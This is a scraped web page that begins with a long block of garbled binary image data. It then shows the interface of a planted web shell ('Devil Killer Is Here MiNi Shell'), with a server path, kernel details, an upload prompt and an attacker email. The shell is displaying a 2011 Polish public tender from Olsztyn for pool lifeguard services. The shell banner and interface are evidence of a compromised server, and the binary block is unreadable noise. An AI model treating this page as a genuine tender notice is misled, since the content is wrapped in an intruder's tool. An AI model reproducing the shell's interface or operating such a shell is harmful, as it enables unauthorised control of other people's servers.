JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111222/435156-N-2011.html

<p class="kh_header"><b>Olsztyn: Świadczenie kompleksowej usługi pn. RATOWNICTWO WODNE PŁYWALNI - polegającej na zapewnieniu bezpieczeństwa użytkownikom  obiektu sportowo-rekreacyjnego pod nazwą Wodne Centrum Rekreacyjno - Sportowe  w Olsztynie</b><br>
<b>Numer ogłoszenia: 435156 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Olsztynie , ul. Żołnierska 13 A, 10-558 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5335132, faks 89 5335132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowej usługi pn. RATOWNICTWO WODNE PŁYWALNI - polegającej na zapewnieniu bezpieczeństwa użytkownikom  obiektu sportowo-rekreacyjnego pod nazwą Wodne Centrum Rekreacyjno - Sportowe  w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usługi ratownictwa wodnego - zapewnienie bezpieczeństwa osób kąpiących się  i przebywających na basenach zlokalizowanych w Wodnym Centrum Rekreacyjno - Sportowym w Olsztynie,  zgodnie z obowiązującymi przepisami, a  szczególności w:
-rozporządzeniu Rady Ministrów z dnia 6 maja 1997r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz. U. z 1997r, Nr 57, poz. 358),
-rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 12 listopada 2002r. w sprawie szczegółowego zakresu obowiązków i uprawnień specjalistycznych organizacji ratowniczych, warunków ich wykonywania przez inne organizacje ratownicze oraz rodzaju i wysokości świadczeń przysługujących ratownikom górskim i wodnym w związku z udziałem w akcji ratowniczej(Dz.U.Nr193, poz.1624),
-ustawą z dnia 18 sierpnia 2011r. o bezpieczeństwie osób przebywających na obszarach wodnych,
-aktualnym rozporządzeniem Ministra Spraw Wewnętrznych i Administracji w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych.
2.Charakterystyka obiektu:
Wodne Centrum Rekreacyjno - Sportowe w Olsztynie, położone przy ulicy Marszałka Józefa Piłsudskiego 69b, składające się z części:
1)Rekreacyjno - Sportowej (basenowej), 
2)Administracyjno-biurowej.
3)Restauracyjnej
4)Odnowy biologicznej
5)Fitness z siłownią
6)Handlowej - kiosku
7)Garażu podziemnego
8)Powierzchni zewnętrznych (do granic posesji) wraz z placem manewrowym i drogami ewakuacyjnymi           
3.Część WCRS objęta przedmiotem postępowania 
Przedmiotem postępowania objęta jest CZĘŚĆ REKREACYJNO - SPORTOWA w skład której wchodzą:
1)basen pływacki z pomostem przesuwnym i dnem ruchomym (51,28 x 25 m, gł. 2 - 2,3 m),
2)basen do rozgrzewki i nauki pływania (25, x 8,5 m gł. 1,0 - 1,3 m),
3)zespół saunowy,
4)zaplecze socjalno - szatniowe
5)pomieszczenie ratowników.
6)brodzik dla dzieci - o powierzchni 12 m2, głębokość 0,3 - 0,5 m.
7)basen rekreacyjny o powierzchni 288 m2 i zróżnicowanej głębokości 0,75 - 1,30 m wyposażony w następujące atrakcje basenowe:
-leżakami do hydromasażu - o poj. 1,5 m3
-leniwa rzeka - 1 szt.
-Wanny do hydromasażu - 3 szt.
-parasol wodny - 1 szt.
-gejzer wodno - powietrzny - 1 szt.
-bicz wodny - 1 szt.
-kaskada - 2 szt.
-stacja masażu poziomego - 3 szt.
8)Zjeżdżalnie z lądowaniem wewnątrz hali - dwururowa zjeżdżalnia z wydzieloną hamownią do lądowania - 1 szt. o parametrach:
a) Zjeżdżalnia Z- 1:
- długość - 120,50 m,
- średnica - 1 000,00 mm,
- różnica poziomów - 10,43 m,
- spadek - 9,3 %,
b) Zjeżdżalnia Z-2
- długość - 115,50 m,
- średnica - 1 000 mm,
- różnica poziomów - 10,43, 
- spadek - 10,5 %,
4.Sposób realizacji usługi
Zamawiający wymaga, aby usługa realizowana była od poniedziałku do niedzieli w następujący sposób:
1) I zmiana:
a) Czas usługi:
Godz. 5:45 - 14:00,
Godz. 5:45 - 6:00 - przygotowanie basenów do pacy,
Godz. 6:00 - 14:00 - zapewnienie bezpieczeństwa na terenie basenu,
b) Wymagana obsada ratownicza podczas zmiany:
-Basen olimpijski - min. 2 ratowników wodnych pływalni,
-Basen rozgrzewkowy - min. 1 ratownik wodny pływalni,
-Basen rekreacyjny + hamownia zjeżdżalnia - min. 3 ratowników wodnych pływalni,
-Nadzór ratowniczy - 1 starszy ratownik WOPR lub ratownik wodny pływalni - kierownik zmiany,
2) II zmiana
a) Czas usługi:
Godz. 14:00 - 22:15
Godz. 14:00 - 22:00 - zapewnienie bezpieczeństwa na terenie basenu,
Godz. 22:00 - 22:15 - prace porządkowe na ternie basenu,
b) Wymagana obsada ratownicza podczas zmiany:
-Basen olimpijski - min. 2 ratowników wodnych pływalni,
-Basen rozgrzewkowy - min. 1 ratownik wodny pływalni,
-Basen rekreacyjny + hamownia zjeżdżalnia - min. 3 ratowników wodnych pływalni,
-Nadzór ratowniczy - 1 starszy ratownik lub ratownik wodny pływalni - kierownik zmiany,
3)Obowiązki czuwających ratowników:
a)zapewnienie bezpieczeństwa i porządku osobom przebywającym w obrębie hali basenowej i zapleczu szatniowym - natychmiastowe udzielanie pierwszej  pomocy osobom uległym wypadkowi,
b)nadzór nad  przestrzeganiem regulaminu pływalni, przepisów porządkowych, BHP, ppoż. oraz innych zarządzeń kierownictwa obiektu,
c)postępowanie zgodnie z regulaminem służby ratowniczej i procedurami opracowanymi przez kierownictwo służby ratowniczej i zaakceptowanymi przez Zamawiającego,
d)pomoc w przygotowywaniu basenu do zajęć szkoleniowych i imprez zleconych w tym: układanie i zbieranie lin torowych, wydawanie i zbierania sprzętu do aerobiku w wodzie, wydawanie sprzętu do nauki pływania),
e)utrzymywanie porządku w pomieszczeniu ratowników i wykorzystywanie go wyłącznie do celów służbowych,
f)nadzór nad ruchem osób w obrębie hali basenowej, zapleczu natryskowo - szatniowym i na trybunach,
g)pomoc w organizacji zajęć grupowych, ścisła współpraca z instruktorami prowadzącymi zajęcia, nadzorowanie wykorzystywania przez ćwiczących urządzeń   i sprzętu  zgodnie z ich przeznaczeniem,
h)obsługa sprzętu basenowego (liny, drabinki, sprzęt sportowy i dydaktyczny),
i)kontrolowanie warunków kąpieli (temperatury wody i otoczenia) i rejestrowanie ich w dzienniku dyżurów,
j)bieżące prowadzenie służby ratowniczej,
k)pełnienie dyżurów w jednolitych strojach, jednoznacznie identyfikujących służbę ratowniczą,
l)sterowanie oświetleniem eliminowanie  zbędnego zużywania przez użytkowników energii elektrycznej i wody,
m)bezzwłoczne zgłaszanie odpowiednim rzemieślnikom - konserwatorom  zauważonych uszkodzeń, w szczególności tych które stwarzają zagrożenie dla użytkowników i których naprawa wymaga odpowiednich kwalifikacji zawodowych,    
n)ścisła współpraca z obsługą szatni w zakresie właściwego jej wykorzystywania,
o)dbanie o stan techniczny sprzętu ratowniczego oraz medycznego będącego na wyposażeniu pływalni, 
p)zgłaszanie kierownictwu obiektu konieczności uzupełnienia sprzętu ratowniczego 
i medycznego w zależności od potrzeb i terminów ważności ich użycia, 
q)wykonywanie innych prac wynikających z zadań i obowiązków ratowników oraz zlecanych przez Kierownika ZKOS wchodzących w zakres obowiązków ratownika.
4)Szczegółowy zakres obowiązków ratowników i określenie maksymalnej  liczby godzin pracy ratowników zawarty jest w załączniku nr 4 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.33.20.00-7, 76.25.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 24.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium.
2.Wymagania dotyczące wadium:
3.Ustala się wadium w wysokości   14 000 zł ( czternaście tysięcy złotych).
4.Wadium należy wnieść przed upływem składania ofert tj. do 05.01.2011 r. do godziny 12:00
5.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)w pieniądzu - potwierdzonym   przelewem na konto OSiR w Banku PEKAO SA  
Nr  88 1240 1590 1111 0010 4048 5462,
2)Poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo Kredytowej,
3)Gwarancjach bankowych,
4)Gwarancjach ubezpieczeniowych,
5)Poręczeniach udzielonych przez przedmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopad 2000 r.  O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr. 109 poz. 1158, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, zamawiający żąda, by wykonawca złożył dokument potwierdzający prowadzenie działalności z zakresu ratownictwa wodnego i  oświadczenie (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, zamawiający żąda by wykonawca złożył oświadczenie (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania potencjałem technicznym zamawiający żąda, by wykonawca złożył oświadczenie (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi aktualne uprawnienia ratownicze - wg przepisów WOPR, w tym:
a)nie mniej niż 21 osób z uprawnieniami ratowników w stopniu Ratownika Wodnego Pływalni,
b)nie mniej niż 2 osoby z uprawnieniami ratowników w stopniu Starszego Ratownika WOPR lub Instruktora WOPR. 
Jednocześnie co najmniej dwie z wymienionych wyżej osób powinny wykazać co najmniej 3 letnie doświadczenie w kierowaniu zespołem ratowników, organizowaniu ich pracy na kąpielisku, a co najmniej  6 osób winno być zatrudnionych na podstawie umowy o pracę. Wykonawca przedłoży Zamawiającemu stosowne umowy o pracę najpóźniej w dniu rozpoczęcia świadczenia usługi.
Dla wykazania, że dysponuje osobami zdolnymi do wykonania zamówienia - Zamawiający żąda złożenia oświadczenia ( załącznik nr 2  do SIWZ ) oraz wykaz osób,  z podaniem nazwiska i imienia ratownika, kwalifikacji zawodowych (stopień, nr uprawnień) wraz z kserokopią aktualnej legitymacji Ratownika WOPR lub innym dokumentem potwierdzającym posiadane kwalifikacje i ważnym  zaświadczeniem o uzyskaniu tytułu ratownika na podstawie Ustawy o Państwowym Ratownictwie Medycznym,  planowanej funkcji podczas wykonywania zadania oraz informacją czy posiadają aktualne zaświadczenie lekarskie poświadczające zdolność do pełnienia funkcji ratownika, a w stosunku do starszego ratownika i instruktora - także doświadczenie w kierowaniu zespołem ratowników i organizacji pracy na kąpielisku/basenie oraz wskaże  podstawę dysponowania tymi osobami wg załącznika Nr 5 do SIWZ oraz złoży  oświadczenie, że osoby posiadają wymagane uprawnienia - wg wzoru Załącznik Nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej, zamawiający żąda, by wykonawca złożył oświadczenie (załącznik nr 2 do SIWZ) oraz udokumentował, że posiada opłaconą polisę ubezpieczeniową, a  w przypadku jej braku inny dokument, potwierdzający, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie usług objętych przedmiotem zamówienia na kwotę nie niższą niż   1.500 000 zł. Do oferty należy dołączyć kopię polisy lub innego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kwestionariusz ofertowy załącznik nr 1 do SIWZ; 2. Wykaz osób załącznik nr 5 do SIWZ; 3.Oświadczenie,że osoby posiadają wymagane uprawnienia załącznik nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba, że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz kreślił warunki takiej zmiany. Zamawiający nie dopuszcza zmiany umowy w przypadku zmiany stawki VAT. Zmiana umowy dokonana z naruszeniem tego przepisu jest nieważna, z zastrzeżeniem ust. poniżej.
5.Zakazuje się istotnych zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy, niekorzystnych dla Zamawiającego stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz określił warunki takiej zmiany. Zmiana umowy dokonana z naruszeniem tego przepisu jest nieważna, z zastrzeżeniem ust. 5 pkt. 5.1. - 5.5.    poniżej. 
5.1.WCRS, w którym mają być świadczone usługi    znajduje się w trakcie budowy. Termin oddania do użytku planowany jest na miesiące luty - marzec.   Zamawiający zastrzega sobie prawo zmiany umowy w zakresie skrócenia  czasu świadczenia usług w przypadku opóźnienia w uruchomieniu WCRS i wypłaty w takim przypadku Wykonawcy wynagrodzenia za faktycznie zrealizowane  usługi. 
5.2.Zamawiający zastrzega sobie w uzasadnionych przypadkach, w szczególności  zamknięcia obiektu  przez służby sanitarno-epidemiologiczne lub nadzoru budowlanego, a także z powodu awarii prawo  skrócenia okresu trwania umowy i wypłaty w takim przypadku  wynagrodzenia za okres  faktycznego świadczenia usług. 
5.3.Zamawiający zastrzega sobie, że w przypadkach szczególnych - np. ograniczonej kwoty środków finansowych przeznaczonych na realizację przedmiotu zamówienia, zmian organizacyjnych  u Zamawiającego , zmian czasu pracy WCRS,  będzie miał prawo w  trakcie realizacji ograniczyć zakres rzeczowy usługi bez żadnych skutków prawno - finansowych  lub odstąpić od umowy w części.  W takim przypadku wykonawcy przysługiwać będzie wynagrodzenie za faktycznie zrealizowane usługi.
5.4.Zakazuje się istotnych zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy, niekorzystnych dla zamawiającego, w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zamawiający nie dopuszcza zmiany wynagrodzenia w przypadku zmiany stawki podatku VAT. 
5.5.Zamawiający zastrzega sobie prawo zmian umowy, gdy zmiany te będą korzystne dla Zamawiającego  i nie będą:- wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która pierwotnie została dopuszczona; - modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul.Żołnierska 13a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 13:00, miejsce: Ośrodek Sportu i Rekreacji w Olsztynie, 10-558 Olsztyn, ul. Żołnierska 13a, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com